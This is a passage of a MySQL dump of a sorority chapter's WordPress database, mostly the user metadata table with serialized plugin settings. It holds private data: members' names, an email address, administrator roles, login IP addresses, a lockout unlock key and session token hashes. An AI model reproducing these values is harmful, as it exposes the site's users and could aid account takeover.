violence','domestic-violence',0),(98,'victim','victim',0),(99,'spirit night','spirit-night',0),(100,'chick-fil-a','chick-fil-a',0),(101,'Denim and Pearlz','denim-and-pearlz',0),(102,'Denim and Pearlz Party','denim-and-pearlz-party',0),(103,'Prom','prom',0),(104,'APPA','appa',0),(105,'Women','women',0),(106,'Empowerment','empowerment',0),(107,'zphib','zphib',0),(108,'makeup','makeup',0),(109,'glam','glam',0),(110,'mask','mask',0),(111,'zetaphibeta','zetaphibeta',0);
/*!40000 ALTER TABLE `lwz_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_usermeta`
--

DROP TABLE IF EXISTS `lwz_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=484 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_usermeta`
--

LOCK TABLES `lwz_usermeta` WRITE;
/*!40000 ALTER TABLE `lwz_usermeta` DISABLE KEYS */;
INSERT INTO `lwz_usermeta` VALUES (1,1,'nickname','pr@zphiblgz.org'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'lwz_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'lwz_user_level','10'),(12,1,'dismissed_wp_pointers','dg41_2,existing-redirects,wp496_privacy'),(13,1,'show_welcome_panel','1'),(422,8,'_itsec_password_requirements','a:1:{s:16:\"evaluation_times\";a:1:{s:8:\"strength\";i:1537970695;}}'),(388,8,'nickname','triggins'),(389,8,'first_name','Tanya'),(390,8,'last_name','Riggins'),(391,8,'description',''),(392,8,'rich_editing','true'),(298,1,'itsec_user_activity_last_seen','1632338134'),(299,1,'itsec-settings-view','grid'),(301,1,'community-events-location','a:1:{s:2:\"ip\";s:11:\"71.120.26.0\";}'),(302,1,'icwp-flag-can-store-user-meta','icwp'),(266,1,'wp_statistics','a:2:{s:13:\"dashboard_set\";s:6:\"11.0.3\";s:10:\"editor_set\";s:6:\"11.0.3\";}'),(267,1,'metaboxhidden_dashboard','a:11:{i:0;s:29:\"wp-statistics-browsers-widget\";i:1;s:30:\"wp-statistics-countries-widget\";i:2;s:28:\"wp-statistics-hitsmap-widget\";i:3;s:25:\"wp-statistics-hits-widget\";i:4;s:26:\"wp-statistics-pages-widget\";i:5;s:27:\"wp-statistics-recent-widget\";i:6;s:30:\"wp-statistics-referring-widget\";i:7;s:27:\"wp-statistics-search-widget\";i:8;s:28:\"wp-statistics-summary-widget\";i:9;s:26:\"wp-statistics-words-widget\";i:10;s:33:\"wp-statistics-top-visitors-widget\";}'),(226,2,'billing_first_name',''),(227,2,'billing_last_name',''),(228,2,'billing_company',''),(229,2,'billing_address_1',''),(230,2,'billing_address_2',''),(222,2,'theme_my_login_security','a:4:{s:9:\"is_locked\";b:1;s:15:\"lock_expiration\";i:1503384523;s:10:\"unlock_key\";s:20:\"wY7GBBog8STsqN5FOepb\";s:21:\"failed_login_attempts\";a:5:{i:0;a:2:{s:4:\"time\";i:1503298113;s:2:\"ip\";s:13:\"217.22.43.154\";}i:1;a:2:{s:4:\"time\";i:1503298116;s:2:\"ip\";s:13:\"217.22.43.154\";}i:2;a:2:{s:4:\"time\";i:1503298118;s:2:\"ip\";s:13:\"217.22.43.154\";}i:3;a:2:{s:4:\"time\";i:1503298121;s:2:\"ip\";s:13:\"217.22.43.154\";}i:4;a:2:{s:4:\"time\";i:1503298123;s:2:\"ip\";s:13:\"217.22.43.154\";}}}'),(231,2,'billing_city',''),(232,2,'billing_postcode',''),(233,2,'billing_country',''),(234,2,'billing_state',''),(235,2,'billing_phone',''),(236,2,'billing_email',''),(237,2,'shipping_first_name',''),(182,2,'lwz_user-settings','libraryContent=browse&editor=tinymce'),(183,2,'lwz_user-settings-time','1484271496'),(184,2,'closedpostboxes_ich_cpt','a:1:{i:0;s:15:\"ichcpt_settings\";}'),(185,2,'metaboxhidden_ich_cpt','a:1:{i:0;s:7:\"slugdiv\";}'),(15,1,'lwz_user-settings','editor=tinymce&libraryContent=browse&urlbutton=file&hidetb=1&mfold=o&editor_plain_text_paste_warning=1&imgsize=medium&post_dfw=off&advImgDetails=hide'),(16,1,'lwz_user-settings-time','1632320788'),(17,1,'lwz_dashboard_quick_press_last_post_id','1451'),(18,1,'closedpostboxes_page','a:1:{i:0;s:10:\"wpseo_meta\";}'),(19,1,'metaboxhidden_page','a:2:{i:0;s:15:\"ts_page_options\";i:1;s:10:\"ts_sidebar\";}'),(471,6,'w3tc_features_seen','a:2:{i:1;s:14:\"lazyload_gmaps\";i:2;s:11:\"setup_guide\";}'),(20,1,'nav_menu_recently_edited','49'),(21,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(22,1,'metaboxhidden_nav-menus','a:17:{i:0;s:19:\"add-post-type-cause\";i:1;s:20:\"add-post-type-sermon\";i:2;s:19:\"add-post-type-event\";i:3;s:23:\"add-post-type-ts_slider\";i:4;s:19:\"add-post-type-video\";i:5;s:22:\"add-post-type-ts_teams\";i:6;s:23:\"add-post-type-portfolio\";i:7;s:30:\"add-post-type-ts_pricing_table\";i:8;s:12:\"add-post_tag\";i:9;s:15:\"add-post_format\";i:10;s:20:\"add-cause_categories\";i:11;s:21:\"add-sermon_categories\";i:12;s:20:\"add-event_categories\";i:13;s:21:\"add-videos_categories\";i:14;s:9:\"add-teams\";i:15;s:32:\"add-portfolio_register_post_type\";i:16;s:31:\"add-ts_pricing_table_categories\";}'),(23,1,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(24,1,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:1:{s:32:\"0fcbc61acd0479dc77e3cccc0f5ffca7\";a:9:{s:10:\"product_id\";i:531;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:10:\"line_total\";d:40;s:8:\"line_tax\";i:0;s:13:\"line_subtotal\";d:40;s:17:\"line_subtotal_tax\";i:0;s:13:\"line_tax_data\";a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}}}}'),(25,1,'account_status','approved'),(26,1,'role','admin'),(27,1,'lwz_r_tru_u_x','a:2:{s:2:\"id\";i:0;s:7:\"expires\";i:1480705021;}'),(28,1,'um_email_as_username_przphiblgz-org','pr@zphiblgz.org'),(29,1,'um_user_profile_url_slug_user_login','przphiblgz-org'),(150,1,'_um_last_login','1480962407'),(32,1,'last_project',NULL),(49,1,'last_project',NULL),(122,1,'um_account_secure_fields','a:4:{s:7:\"general\";a:4:{s:10:\"user_login\";a:10:{s:5:\"title\";s:8:\"Username\";s:7:\"metakey\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:8:\"Username\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:0;s:8:\"validate\";s:15:\"unique_username\";s:9:\"min_chars\";i:3;s:9:\"max_chars\";i:24;}s:10:\"first_name\";a:7:{s:5:\"title\";s:10:\"First Name\";s:7:\"metakey\";s:10:\"first_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;}s:9:\"last_name\";a:7:{s:5:\"title\";s:9:\"Last Name\";s:7:\"metakey\";s:9:\"last_name\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;}s:10:\"user_email\";a:7:{s:5:\"title\";s:14:\"E-mail Address\";s:7:\"metakey\";s:10:\"user_email\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:14:\"E-mail Address\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"validate\";s:12:\"unique_email\";}}s:8:\"password\";a:1:{s:13:\"user_password\";a:11:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:13:\"user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:9:\"min_chars\";i:8;s:9:\"max_chars\";i:30;s:15:\"force_good_pass\";i:1;s:18:\"force_confirm_pass\";i:1;}}s:7:\"privacy\";a:2:{s:15:\"profile_privacy\";a:13:{s:5:\"title\";s:15:\"Profile Privacy\";s:7:\"metakey\";s:15:\"profile_privacy\";s:4:\"type\";s:6:\"select\";s:5:\"label\";s:15:\"Profile Privacy\";s:4:\"help\";s:32:\"Who can see your public profile?\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:7:\"default\";s:8:\"Everyone\";s:7:\"options\";a:2:{i:0;s:8:\"Everyone\";i:1;s:7:\"Only me\";}s:10:\"allowclear\";i:0;s:12:\"account_only\";b:1;s:13:\"required_perm\";s:24:\"can_make_private_profile\";}s:15:\"hide_in_members\";a:12:{s:5:\"title\";s:30:\"Hide my profile from directory\";s:7:\"metakey\";s:15:\"hide_in_members\";s:4:\"type\";s:5:\"radio\";s:5:\"label\";s:30:\"Hide my profile from directory\";s:4:\"help\";s:61:\"Here you can hide yourself from appearing in public directory\";s:8:\"required\";i:0;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:7:\"default\";s:2:\"No\";s:7:\"options\";a:2:{i:0;s:2:\"No\";i:1;s:3:\"Yes\";}s:12:\"account_only\";b:1;s:12:\"required_opt\";a:2:{i:0;s:12:\"members_page\";i:1;i:1;}}}s:6:\"delete\";a:1:{s:20:\"single_user_password\";a:8:{s:5:\"title\";s:8:\"Password\";s:7:\"metakey\";s:20:\"single_user_password\";s:4:\"type\";s:8:\"password\";s:5:\"label\";s:8:\"Password\";s:8:\"required\";i:1;s:6:\"public\";i:1;s:8:\"editable\";i:1;s:12:\"account_only\";b:1;}}}'),(151,2,'nickname','lillet'),(152,2,'first_name','Lillet'),(153,2,'last_name',''),(154,2,'description',''),(155,2,'rich_editing','true'),(156,2,'comment_shortcuts','false'),(157,2,'admin_color','fresh'),(158,2,'use_ssl','0'),(159,2,'show_admin_bar_front','true'),(160,2,'lwz_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(161,2,'lwz_user_level','10'),(162,2,'dismissed_wp_pointers',''),(164,2,'manageedit-shop_ordercolumnshidden','a:1:{i:0;s:15:\"billing_address\";}'),(165,2,'lwz_dashboard_quick_press_last_post_id','1112'),(166,1,'closedpostboxes_ich_cpt','a:0:{}'),(167,1,'metaboxhidden_ich_cpt','a:1:{i:0;s:7:\"slugdiv\";}'),(186,1,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:104:\"dashboard_right_now,dashboard_activity,woocommerce_dashboard_recent_reviews,woocommerce_dashboard_status\";s:4:\"side\";s:39:\"dashboard_primary,dashboard_quick_press\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(189,1,'meta-box-order_cause','a:3:{s:4:\"side\";s:73:\"submitdiv,tagsdiv-post_tag,cause_categoriesdiv,pageparentdiv,postimagediv\";s:6:\"normal\";s:71:\"postexcerpt,trackbacksdiv,postcustom,commentstatusdiv,slugdiv,authordiv\";s:8:\"advanced\";s:5:\"cause\";}'),(190,1,'screen_layout_cause','2'),(191,1,'closedpostboxes_cause','a:0:{}'),(192,1,'metaboxhidden_cause','a:1:{i:0;s:7:\"slugdiv\";}'),(193,1,'meta-box-order_page','a:3:{s:4:\"side\";s:47:\"submitdiv,postimagediv,pageparentdiv,ts_sidebar\";s:6:\"normal\";s:107:\"ts_header_and_footer,ts_page_options,revisionsdiv,postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv\";s:8:\"advanced\";s:29:\"ts_layout_id,ts-import-export\";}'),(194,1,'screen_layout_page','2'),(238,2,'shipping_last_name',''),(239,2,'shipping_company',''),(240,2,'shipping_address_1',''),(241,2,'shipping_address_2',''),(242,2,'shipping_city',''),(243,2,'shipping_postcode',''),(244,2,'shipping_country',''),(245,2,'shipping_state',''),(246,2,'last_update','1484185709'),(250,2,'session_tokens','a:2:{s:64:\"7fbfbec8b2867e15b84743bcb2a2c4a669cbc7825a343cb1482e4776ae9c997c\";a:4:{s:10:\"expiration\";i:1504241096;s:2:\"ip\";s:15:\"167.249.225.200\";s:2:\"ua\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0\";s:5:\"login\";i:1503031496;}s:64:\"ceda018e255a278a8ef641231874400c5f10a1cb8f5b73ef422e16dda6aed31a\";a:4:{s:10:\"expiration\";i:1504244565;s:2:\"ip\";s:14:\"170.247.42.153\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1503034965;}}'),(251,1,'maxbuttons_review_notice','1485123518'),(363,1,'icwp-wpsf-meta','a:11:{s:6:\"prefix\";s:9:\"icwp-wpsf\";s:7:\"user_id\";i:1;s:20:\"notice_wizardwelcome\";a:1:{s:4:\"time\";i:1520940911;}s:30:\"notice_pluginmailinglistsignup\";a:1:{s:4:\"time\";i:1520940911;}s:17:\"notice_rateplugin\";a:1:{s:4:\"time\";i:1520940911;}s:22:\"notice_translateplugin\";a:1:{s:4:\"time\";i:1520940911;}s:20:\"notice_allowtracking\";a:1:{s:4:\"time\";i:1520940911;}s:9:\"pass_hash\";s:4:\"ee92\";s:15:\"pass_started_at\";i:1567784516;s:13:\"first_seen_at\";i:1567784516;s:9:\"flash_msg\";a:4:{s:7:\"message\";s:139:\"[Shield Security] Warning: Can not use the Rename WP Login feature because you have the \"Theme My Login\" plugin installed and it is active.\";s:10:\"expires_at\";i:1632338824;s:5:\"error\";b:1;s:10:\"show_login\";b:0;}}'),(256,1,'gform_recent_forms','a:4:{i:0;s:1:\"7\";i:1;s:1:\"6\";i:2;s:2:\"10\";i:3;s:1:\"1\";}'),(254,1,'wpseo-dismiss-onboarding-notice','seen'),(257,1,'closedpostboxes_post','a:1:{i:0;s:10:\"wpseo_meta\";}'),(258,1,'metaboxhidden_post','a:11:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:11:\"commentsdiv\";i:5;s:7:\"slugdiv\";i:6;s:9:\"authordiv\";i:7;s:14:\"ts-post-images\";i:8;s:11:\"video_embed\";i:9;s:11:\"audio_embed\";i:10;s:29:\"wp_statistics_editor_meta_box\";}'),(259,1,'closedpostboxes_wpdmpro','a:0:{}'),(260,1,'metaboxhidden_wpdmpro','a:1:{i:0;s:7:\"slugdiv\";}'),(261,2,'gform_recent_forms','a:2:{i:0;s:1:\"4\";i:1;s:1:\"1\";}'),(304,6,'nickname','crystalwhitaker'),(305,6,'first_name','Crystal'),(306,6,'last_name','Whitaker'),(307,6,'description',''),(308,6,'rich_editing','true'),(309,6,'comment_shortcuts','false'),(310,6,'admin_color','fresh'),(311,6,'use_ssl','0'),(312,6,'show_admin_bar_front','true'),(313,6,'locale',''),(314,6,'lwz_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(315,6,'lwz_user_level','10'),(316,6,'_yoast_wpseo_profile_updated','1508738699'),(317,6,'dismissed_wp_pointers','wp496_privacy'),(318,7,'nickname','lgz_president'),(319,7,'first_name',''),(320,7,'last_name',''),(321,7,'description',''),(322,7,'rich_editing','true'),(323,7,'comment_shortcuts','false'),(324,7,'admin_color','fresh'),(325,7,'use_ssl','0'),(326,7,'show_admin_bar_front','true'),(327,7,'locale',''),(328,7,'lwz_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(329,7,'lwz_user_level','10'),(330,7,'_yoast_wpseo_profile_updated','1508739008'),(331,7,'dismissed_wp_pointers',''),(332,1,'_yoast_wpseo_profile_updated','1508739127'),(333,1,'wpseo_title',''),(334,1,'wpseo_metadesc',''),(335,1,'wpseo_metakey',''),(336,1,'wpseo_noindex_author',''),(337,1,'wpseo_content_analysis_disable',''),(338,1,'wpseo_keyword_analysis_disable',''),(339,1,'locale',''),(340,1,'googleplus',''),(341,1,'twitter',''),(342,1,'facebook',''),(343,1,'itsec_last_password_change','1562251457'),(272,2,'wp_statistics','a:2:{s:13:\"dashboard_set\";s:4:\"12.0\";s:10:\"editor_set\";s:4:\"12.0\";}'),(273,2,'metaboxhidden_dashboard','a:11:{i:0;s:29:\"wp-statistics-browsers-widget\";i:1;s:30:\"wp-statistics-countries-widget\";i:2;s:28:\"wp-statistics-hitsmap-widget\";i:3;s:25:\"wp-statistics-hits-widget\";i:4;s:26:\"wp-statistics-pages-widget\";i:5;s:27:\"wp-statistics-recent-widget\";i:6;s:30:\"wp-statistics-referring-widget\";i:7;s:27:\"wp-statistics-search-widget\";i:8;s:28:\"wp-statistics-summary-widget\";i:9;s:26:\"wp-statistics-words-widget\";i:10;s:33:\"wp-statistics-top-visitors-widget\";}'),(274,2,'metaboxhidden_post','a:1:{i:0;s:29:\"wp_statistics_editor_meta_box\";}'),(275,2,'metaboxhidden_page','a:1:{i:0;s:29:\"wp_statistics_editor_meta_box\";}'),(295,1,'theme_my_login_security','a:4:{s:9:\"is_locked\";b:0;s:15:\"lock_expiration\";i:0;s:10:\"unlock_key\";s:0:\"\";s:21:\"failed_login_attempts\";a:1:{i:0;a:2:{s:4:\"time\";i:1503313966;s:2:\"ip\";s:13:\"91.126.176.49\";}}}'),(296,1,'manageedit-eventcolumnshidden','a:3:{i:0;s:11:\"wpseo-title\";i:1;s:14:\"wpseo-metadesc\";i:2;s:13:\"wpseo-focuskw\";}'),(297,1,'lwz_nf_form_preview_2','a:4:{s:2:\"id\";i:2;s:8:\"settings\";a:102:{s:5:\"title\";s:10:\"Contact Me\";s:3:\"key\";s:0:\"\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:57\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:9:\"logged_in\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:5:{i:0;s:4:\"name\";i:1;s:5:\"email\";i:2;s:29:\"listmultiselect_1505305116113\";i:3;s:7:\"message\";i:4;s:6:\"submit\";}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:14:\"drawerDisabled\";b:0;}s:6:\"fields\";a:5:{i:5;a:1:{s:8:\"settings\";a:70:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";i:2;s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:57\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";i:1;s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3277\";}}i:6;a:1:{s:8:\"settings\";a:62:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";i:2;s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2017-09-13 07:17:57\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";i:2;s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";}}i:7;a:1:{s:8:\"settings\";a:71:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_